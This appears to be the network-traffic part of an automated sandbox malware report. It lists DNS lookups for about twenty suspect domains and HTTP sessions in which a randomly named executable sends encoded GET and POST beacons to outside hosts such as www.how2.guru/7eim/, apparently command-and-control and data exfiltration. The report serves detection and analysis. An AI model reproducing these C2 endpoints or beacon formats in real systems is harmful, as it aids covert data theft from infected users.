                                                                                                                                                                                                                        Oct 23, 2024 18:54:54.978439093 CEST192.168.11.201.1.1.10x11f8Standard query (0)www.1-mine.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.428690910 CEST192.168.11.201.1.1.10x805fStandard query (0)www.binacamasala.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.678219080 CEST192.168.11.201.1.1.10xde5eStandard query (0)www.wrl-llc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.000207901 CEST192.168.11.201.1.1.10xd522Standard query (0)www.xtelify.techA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.308197021 CEST192.168.11.201.1.1.10x9a0cStandard query (0)www.bigliaserramenti.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.695924997 CEST192.168.11.201.1.1.10xff45Standard query (0)www.theawareness.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.052464962 CEST192.168.11.201.1.1.10xf12Standard query (0)www.gokulmohan.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.721496105 CEST192.168.11.201.1.1.10xcb17Standard query (0)www.3bbfibre3app.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.046901941 CEST192.168.11.201.1.1.10x178dStandard query (0)www.lichnyyrost.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.543816090 CEST192.168.11.201.1.1.10xa13cStandard query (0)www.innovators.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.589616060 CEST1.1.1.1192.168.11.200x586cNo error (0)drive.google.com142.250.80.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.178540945 CEST1.1.1.1192.168.11.200xe38No error (0)drive.usercontent.google.com142.250.176.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.188555002 CEST1.1.1.1192.168.11.200x1ee0No error (0)www.caprinaday.net62.149.128.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:53:42.756848097 CEST1.1.1.1192.168.11.200x3cd0No error (0)www.how2.guru13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:53:42.756848097 CEST1.1.1.1192.168.11.200x3cd0No error (0)www.how2.guru76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.005949020 CEST1.1.1.1192.168.11.200xb19No error (0)www.ruarlo.xyz162.0.231.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.609085083 CEST1.1.1.1192.168.11.200xe02eNo error (0)www.refs4refs.inforefs4refs.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.609085083 CEST1.1.1.1192.168.11.200xe02eNo error (0)refs4refs.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.609085083 CEST1.1.1.1192.168.11.200xe02eNo error (0)refs4refs.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:22.921046972 CEST1.1.1.1192.168.11.200xe1cdNo error (0)www.estrela-b.onlineestrela-b.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:22.921046972 CEST1.1.1.1192.168.11.200xe1cdNo error (0)estrela-b.online162.241.63.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.377896070 CEST1.1.1.1192.168.11.200x95b8No error (0)www.russe-trykk.online185.134.245.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.089535952 CEST1.1.1.1192.168.11.200x11f8No error (0)www.1-mine.online172.67.148.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.089535952 CEST1.1.1.1192.168.11.200x11f8No error (0)www.1-mine.online104.21.11.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.590976000 CEST1.1.1.1192.168.11.200x805fNo error (0)www.binacamasala.combinacamasala.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.590976000 CEST1.1.1.1192.168.11.200x805fNo error (0)binacamasala.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.590976000 CEST1.1.1.1192.168.11.200x805fNo error (0)binacamasala.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.816339016 CEST1.1.1.1192.168.11.200xde5eNo error (0)www.wrl-llc.netwrl-llc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.816339016 CEST1.1.1.1192.168.11.200xde5eNo error (0)wrl-llc.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.816339016 CEST1.1.1.1192.168.11.200xde5eNo error (0)wrl-llc.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.132436991 CEST1.1.1.1192.168.11.200xd522No error (0)www.xtelify.techxtelify.techCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.132436991 CEST1.1.1.1192.168.11.200xd522No error (0)xtelify.tech84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.555155039 CEST1.1.1.1192.168.11.200x9a0cNo error (0)www.bigliaserramenti.com75.2.19.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.803216934 CEST1.1.1.1192.168.11.200xff45No error (0)www.theawareness.shop172.67.177.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.803216934 CEST1.1.1.1192.168.11.200xff45No error (0)www.theawareness.shop104.21.83.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.167007923 CEST1.1.1.1192.168.11.200xf12No error (0)www.gokulmohan.online104.21.64.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.167007923 CEST1.1.1.1192.168.11.200xf12No error (0)www.gokulmohan.online172.67.185.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.928355932 CEST1.1.1.1192.168.11.200xcb17No error (0)www.3bbfibre3app.netghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.928355932 CEST1.1.1.1192.168.11.200xcb17No error (0)ghs.googlehosted.com142.251.40.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.675441027 CEST1.1.1.1192.168.11.200x178dNo error (0)www.lichnyyrost.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.869746923 CEST1.1.1.1192.168.11.200xa13cNo error (0)www.innovators.group13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.869746923 CEST1.1.1.1192.168.11.200xa13cNo error (0)www.innovators.group76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        • drive.google.com
                                                                                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                                                                                        • www.caprinaday.net
                                                                                                                                                                                                                        • www.how2.guru
                                                                                                                                                                                                                        • www.ruarlo.xyz
                                                                                                                                                                                                                        • www.refs4refs.info
                                                                                                                                                                                                                        • www.estrela-b.online
                                                                                                                                                                                                                        • www.russe-trykk.online
                                                                                                                                                                                                                        • www.1-mine.online
                                                                                                                                                                                                                        • www.binacamasala.com
                                                                                                                                                                                                                        • www.wrl-llc.net
                                                                                                                                                                                                                        • www.xtelify.tech
                                                                                                                                                                                                                        • www.bigliaserramenti.com
                                                                                                                                                                                                                        • www.theawareness.shop
                                                                                                                                                                                                                        • www.gokulmohan.online
                                                                                                                                                                                                                        • www.3bbfibre3app.net
                                                                                                                                                                                                                        • www.lichnyyrost.online
                                                                                                                                                                                                                        • www.innovators.group
                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.11.204979262.149.128.45805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.392762899 CEST536OUTGET /pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS+CBDl0e/03G6vIGgM2DOx4ZCTRM54bCOA7z+XcSGAiseRvin1n9lPpnkGa0LOYYd0oIGRqFGq723QGUcE=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.caprinaday.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.587057114 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:53:26 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Length: 5096
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.587080002 CEST1289INData Raw: 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30
                                                                                                                                                                                                                        Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.587094069 CEST1289INData Raw: 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64
                                                                                                                                                                                                                        Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.587109089 CEST1289INData Raw: 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e
                                                                                                                                                                                                                        Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.587121964 CEST159INData Raw: 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 31 37 37 36 33 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f
                                                                                                                                                                                                                        Data Ascii: oft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.11.204979313.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:53:42.869393110 CEST796OUTPOST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 43 73 54 70 6c 46 6a 59 59 57 4e 37 30 79 66 6a 71 2f 67 56 53 70 39 34 35 4f 66 7a 72 6b 6b 55 76 35 57 4d 37 35 73 77 63 51 73 50 42 66 51 55 34 47 7a 68 69 39 67 4d 51 4f 79 48 53 6d 41 6c 6a 48 4e 50 61 2f 65 32 37 2b 4a 51 71 49 37 44 49 5a 2b 32 74 66 4f 58 64 54 4d 69 77 4b 67 61 6e 39 57 44 56 57 73 6c 4b 69 36 67 74 4b 5a 71 54 54 65 58 6a 76 63 77 48 79 63 65 6c 6e 43 31 37 52 74 49 59 74 79 54 62 71 55 6e 37 33 6d 49 47 73 72 68 39 6e 6c 64 43 65 62 79 39 6e 43 31 54 48 4e 4f 33 43 39 54 4f 76 63 53 4c 45 6a 4f 4e 43 68 75 36 7a 44 51 72 6d 31 46 39 44 35 62 43 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN70yfjq/gVSp945OfzrkkUv5WM75swcQsPBfQU4Gzhi9gMQOyHSmAljHNPa/e27+JQqI7DIZ+2tfOXdTMiwKgan9WDVWslKi6gtKZqTTeXjvcwHycelnC17RtIYtyTbqUn73mIGsrh9nldCeby9nC1THNO3C9TOvcSLEjONChu6zDQrm1F9D5bCg==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.11.204979413.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:53:45.508618116 CEST816OUTPOST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 43 73 54 70 6c 46 6a 59 59 57 4e 37 31 53 50 6a 6c 38 59 56 46 35 39 33 32 75 66 7a 6c 45 6b 51 76 34 71 4d 37 38 56 31 64 6c 45 50 42 2b 67 55 35 46 72 68 6c 39 67 4d 49 2b 79 43 64 47 41 75 6a 48 52 39 61 36 32 32 37 2b 64 51 71 49 4c 44 49 75 4c 45 69 76 4f 52 56 7a 4d 67 2b 71 67 61 6e 39 57 44 56 58 4e 49 4b 69 69 67 71 2f 4a 71 53 33 43 55 39 66 64 43 43 79 63 65 68 6e 43 78 37 52 73 6e 59 6f 72 38 62 76 51 6e 37 32 57 49 47 35 58 2b 71 58 6c 45 66 75 61 4f 73 33 2f 65 59 6b 4a 34 7a 7a 4a 52 4c 75 68 76 4f 53 75 55 51 77 56 4b 35 67 66 69 76 57 4d 74 2f 42 34 41 66 75 79 4e 34 61 32 43 6b 2b 47 74 64 64 57 74 2f 37 50 54 2f 75 67 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN71SPjl8YVF5932ufzlEkQv4qM78V1dlEPB+gU5Frhl9gMI+yCdGAujHR9a6227+dQqILDIuLEivORVzMg+qgan9WDVXNIKiigq/JqS3CU9fdCCycehnCx7RsnYor8bvQn72WIG5X+qXlEfuaOs3/eYkJ4zzJRLuhvOSuUQwVK5gfivWMt/B4AfuyN4a2Ck+GtddWt/7PT/ug=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.11.204979513.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:53:48.152631998 CEST2578OUTPOST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 43 73 54 70 6c 46 6a 59 59 57 4e 37 31 53 50 6a 6c 38 59 56 46 35 39 33 32 75 66 7a 6c 45 6b 51 76 34 71 4d 37 38 56 31 64 6c 63 50 42 49 63 55 34 6b 72 68 6b 39 67 4d 57 4f 79 44 64 47 41 76 6a 48 4a 35 61 36 36 49 37 36 74 51 72 71 44 44 41 38 6a 45 35 66 4f 52 4b 44 4d 74 77 4b 67 50 6e 39 48 72 56 58 39 49 4b 69 69 67 71 2b 35 71 62 44 65 55 2f 66 63 77 48 79 63 73 6c 6e 43 56 37 51 46 51 59 70 36 44 62 38 59 6e 36 57 47 49 45 50 44 2b 32 48 6c 52 65 75 61 57 73 33 7a 42 59 6c 6c 61 7a 77 56 37 4c 74 42 76 50 45 6e 38 46 6b 4e 31 74 42 44 42 74 46 34 36 7a 41 34 38 51 74 43 71 39 4a 36 52 76 49 61 6e 64 62 61 6b 76 4c 37 31 72 37 5a 74 58 62 61 58 39 54 69 71 67 30 44 53 62 47 49 49 4e 43 65 50 52 59 44 74 65 57 59 59 54 34 46 68 68 43 57 42 2f 2f 72 46 75 73 30 43 46 4e 68 68 77 53 2b 32 64 72 56 57 33 59 6e 78 75 32 2b 47 38 74 44 55 50 55 79 4a 51 32 7a 31 4b 75 77 58 6b 4e 49 55 30 38 35 30 72 64 35 47 44 38 45 54 42 68 66 49 43 44 4c 4c 44 77 77 50 47 38 59 4b 34 35 34 71 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN71SPjl8YVF5932ufzlEkQv4qM78V1dlcPBIcU4krhk9gMWOyDdGAvjHJ5a66I76tQrqDDA8jE5fORKDMtwKgPn9HrVX9IKiigq+5qbDeU/fcwHycslnCV7QFQYp6Db8Yn6WGIEPD+2HlReuaWs3zBYllazwV7LtBvPEn8FkN1tBDBtF46zA48QtCq9J6RvIandbakvL71r7ZtXbaX9Tiqg0DSbGIINCePRYDteWYYT4FhhCWB//rFus0CFNhhwS+2drVW3Ynxu2+G8tDUPUyJQ2z1KuwXkNIU0850rd5GD8ETBhfICDLLDwwPG8YK454q8MHIZRHjs+jEs20kL1w2EseuxSoKVptusoO+0+bL1gb84wZcueQq4l2cIBWXQH/dmb+vIi2AfY+yqMFb5q0s2kj2AXaiuCRzsQYX2lwbUUYupdsr+Ee1Gy57tXjh+r/Y1lepsMRaWvWXeDqQyBOtrXYCI/NQvX42Om5rfIjYsgq41XvboRpjkAqkcLqoZWNW52sAka0q95cSxwjauAIggAYO7pJ7/Y32uq0A/BxGOqYnZZ1niM+3pS02CrlEXkacEAox3rDCuzyON8KGiHAZTiS0jdd4Y5d2h+nGXSIbFWiTfLJJwaEFEa42VPcbdg3hW4pYdX18Ua+sAXAAno62wfqWZr3zme7dU/sY2svFNOp7qjUxwrIJECc9YrvdIrHoryY+LBL5uVzIEJh7g8KJMpDT7iusfg659VY8yxnMZTawcjGj+dQh7C5dtyr/8VkLyiYlfA2D4ENo9O0+2UA5JP50wB9jyk/eKAQFJUYtZG9FEywrU8E4VHD9MACac7gnzuggpTQpCKt/DD8LEU2wqCV9sXpd68S4BpDrIF6LJaeeSfakum3QTx637Bix6yLre1ByTT6duw2CSlALwirN1y5YHTASgCUTK3orC2DeEPXVlXvo+nbzUVowZLUo/ue9I3ewWkml+Z0MHIHbsp7scwDGekkYk9pPss [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:53:48.152723074 CEST5387OUTData Raw: 37 74 55 34 69 4a 53 61 42 32 77 41 41 6d 6e 69 78 64 6b 5a 64 2b 4a 44 73 71 4d 63 70 57 6c 56 63 34 37 72 6a 45 76 69 66 2b 56 72 55 36 61 47 72 41 78 2f 34 42 41 74 2b 4d 56 46 43 42 4f 30 65 49 52 59 32 6b 34 2b 53 79 55 75 4f 6f 2b 4b 70 39
                                                                                                                                                                                                                        Data Ascii: 7tU4iJSaB2wAAmnixdkZd+JDsqMcpWlVc47rjEvif+VrU6aGrAx/4BAt+MVFCBO0eIRY2k4+SyUuOo+Kp9VtI88q+TmRwHoLmfg6RJoS8rOGjNN+9BrdzU8/sL2BNn/kl11XymjJiYck25spwsEMAA7OBwaRC6CZzSjfXRGnHyZ4eP1538S+fR6FobU6Thfa0+Et8FnIQm9BavfO5DdZ+24UWjVbPYtbtax9CZw7Xay/CsuNMYI


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        4192.168.11.204979613.248.169.48805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.788615942 CEST531OUTGET /7eim/?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:53:50.891609907 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:53:50 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
